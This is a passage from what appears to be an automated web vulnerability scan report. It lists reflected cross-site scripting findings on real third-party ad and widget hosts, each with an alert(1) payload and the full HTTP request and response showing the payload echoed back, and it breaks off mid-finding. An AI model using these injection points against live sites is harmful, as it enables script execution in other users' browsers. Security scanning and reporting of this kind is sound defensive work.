4.295. http://r.skimresources.com/api/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.skimresources.com
Path:   /api/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 164ae<script>alert(1)</script>9e4016ae50 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/?callback=skimlinksApplyHandlers164ae<script>alert(1)</script>9e4016ae50&data=%7B%22pubcode%22%3A%22905X224440%22%2C%22domains%22%3A%5B%22rachelroy.com%22%2C%22endless.com%22%2C%22temptalia.com%22%2C%22sephora.com%22%2C%22facebook.com%22%2C%22twitter.com%22%2C%22digg.com%22%2C%22myspace.com%22%2C%22new.facebook.com%22%2C%22sweepstakes.womansday.com%22%2C%22services.hearstmags.com%22%2C%22caranddriver.com%22%2C%22cycleworld.com%22%2C%22elledecor.com%22%2C%22roadandtrack.com%22%2C%22womansday.com%22%2C%22glo.msn.com%22%5D%7D HTTP/1.1
Host: r.skimresources.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 16:39:10 GMT
P3P: policyref="http://skimlinks.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
X-SKIM-Hostname: api03.angel.skimlinks.com
Content-Length: 172
Connection: keep-alive

skimlinksApplyHandlers164ae<script>alert(1)</script>9e4016ae50({"merchant_domains":["sephora.com","endless.com"],"country":"US","guid":"af7c6cccf2814117102a6929c45f1eb3"});
4.296. http://sb1.analoganalytics.com/publishers/hearst-seattlepi/deal-of-the-day.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sb1.analoganalytics.com
Path:   /publishers/hearst-seattlepi/deal-of-the-day.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ce258<script>alert(1)</script>d2d6ebc81ad was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publishers/hearst-seattlepi/deal-of-the-day.json?callback=ANALOG._retrieveDailyDealDatace258<script>alert(1)</script>d2d6ebc81ad HTTP/1.1
Host: sb1.analoganalytics.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 17 Sep 2011 16:24:55 GMT
Content-Type: application/javascript
Connection: keep-alive
Status: 200 OK
ETag: "b4920233f20df6d93df4071728f51854"
X-Runtime: 67
Content-Length: 686
Cache-Control: max-age=600, public

ANALOG._retrieveDailyDealDatace258<script>alert(1)</script>d2d6ebc81ad({"daily_deal":{"ending_time_in_milliseconds":1316415300000,"link":"http://dailydeal.seattlepi.com/daily_deals/26923","is_sold_out":false,"advertiser_name":"Village Theatre Enter to Win","utc_end_time_
...[SNIP]...
4.297. http://servedby.flashtalking.com/imp/3/17799 [189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The value of the 189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52b4d"-alert(1)-"adf3f354e36 was submitted in the 189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f52b4d"-alert(1)-"adf3f354e36&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 17 Sep 2011 16:52:35 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 564


var ftGUID_189583="13553516C34A7B";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f52b4d"-alert(1)-"adf3f354e36&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src
...[SNIP]...
4.298. http://servedby.flashtalking.com/imp/3/17799 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a23e0"-alert(1)-"51b6020d3b9 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485a23e0"-alert(1)-"51b6020d3b9 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:53:37 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 564
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061005 (MII-APC/2.1)


var ftGUID_189583="13553516C34A7B";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485a23e0"-alert(1)-"51b6020d3b9";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/18/189583/237666/js/j
...[SNIP]...
4.299. http://servedby.flashtalking.com/imp/3/17799 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 359ac"-alert(1)-"7afa2590ba3 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=359ac"-alert(1)-"7afa2590ba3&ftscw=&cachebuster=272524.66208301485 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:53:14 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 564
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061001 (MII-APC/2.1)


var ftGUID_189583="13553516C34A7B";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=359ac"-alert(1)-"7afa2590ba3&ftscw=&cachebuster=272524.66208301485";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src="http://cdn.flas
...[SNIP]...
4.300. http://servedby.flashtalking.com/imp/3/17799 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc80e"-alert(1)-"25b36471da2 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=fc80e"-alert(1)-"25b36471da2&cachebuster=272524.66208301485 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:53:25 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 564
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/2.1)


var ftGUID_189583="13553516C34A7B";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=fc80e"-alert(1)-"25b36471da2&cachebuster=272524.66208301485";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src="http://cdn.flashtalkin
...[SNIP]...
4.301. http://servedby.flashtalking.com/imp/3/17799 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52a7d"-alert(1)-"5c6c40b08cb was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=52a7d"-alert(1)-"5c6c40b08cb&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 17 Sep 2011 16:52:49 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 564


var ftGUID_189583="13553516C34A7B";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=52a7d"-alert(1)-"5c6c40b08cb&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src="htt
...[SNIP]...
4.302. http://servedby.flashtalking.com/imp/3/17799 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e83"-alert(1)-"0b83ccb51b7 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=f1e83"-alert(1)-"0b83ccb51b7&ftadz=&ftscw=&cachebuster=272524.66208301485 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:53:02 GMT
Server: Jetty(6.1.22)
Content-Length: 564
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/2.1)


var ftGUID_189583="13553516C34A7B";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=f1e83"-alert(1)-"0b83ccb51b7&ftadz=&ftscw=&cachebuster=272524.66208301485";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src="http://c
...[SNIP]...
4.303. http://servedby.flashtalking.com/imp/3/17799 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/17799

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81b6d"-alert(1)-"bfaf131ab6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/17799;189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485&81b6d"-alert(1)-"bfaf131ab6d=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:53:59 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Type: text/javascript
Content-Length: 567
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061002 (MII-APC/2.1)


var ftGUID_189583="13551AD7D8BDD4";
var ftConfID_189583="237666001";
var ftParams_189583="click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485&81b6d"-alert(1)-"bfaf131ab6d=1";
var ftKeyword_189583="";
var ftSegment_189583="";
var ftSegmentList_189583=[];
var ftRuleMatch_189583="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/18/189583/237666/js
...[SNIP]...
4.304. http://studio-5.financialcontent.com/hearst [Account parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /hearst

Issue detail

The value of the Account request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c401'-alert(1)-'da1e73d44f6 was submitted in the Account parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst?Account=timesunion7c401'-alert(1)-'da1e73d44f6&Module=markets&Output=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:17 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 17 Sep 2011 16:23:17 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 905

document.write('\n');
document.write('');

var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fhearst%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Account%3Dtimesunion7c401'-alert(1)-'da1e73d44f6%26Module%3Dmarkets%26Output%3DJS&Type=widget&Client=hearst.timesunion7c401-alert(1)-da1e73d44f6&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=d
...[SNIP]...
4.305. http://studio-5.financialcontent.com/hearst [Module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /hearst

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767a7'-alert(1)-'445d9ff3559 was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst?Account=timesunion&Module=markets767a7'-alert(1)-'445d9ff3559&Output=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:18 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 17 Sep 2011 16:23:18 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 837


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fhearst%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Account%3Dtimesunion%26Module%3Dmarkets767a7'-alert(1)-'445d9ff3559%26Output%3DJS&Type=widget&Client=hearst.timesunion&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var
...[SNIP]...
4.306. http://studio-5.financialcontent.com/hearst [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /hearst

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1465b'-alert(1)-'6609652ad8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst1465b'-alert(1)-'6609652ad8e?Account=timesunion&Module=markets&Output=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.timesunion.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:22 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 17 Sep 2011 16:23:22 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 865


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fhearst1465b'-alert(1)-'6609652ad8e%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Account%3Dtimesunion%26Module%3Dmarkets%26Output%3DJS&Type=widget&Client=hearst1465b'-alert(1)-'6609652ad8e.timesunion&rand=' + Math.random(
...[SNIP]...
4.307. http://studio-5.financialcontent.com/hearst [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /hearst

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1b85'-alert(1)-'f5875b9d399 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

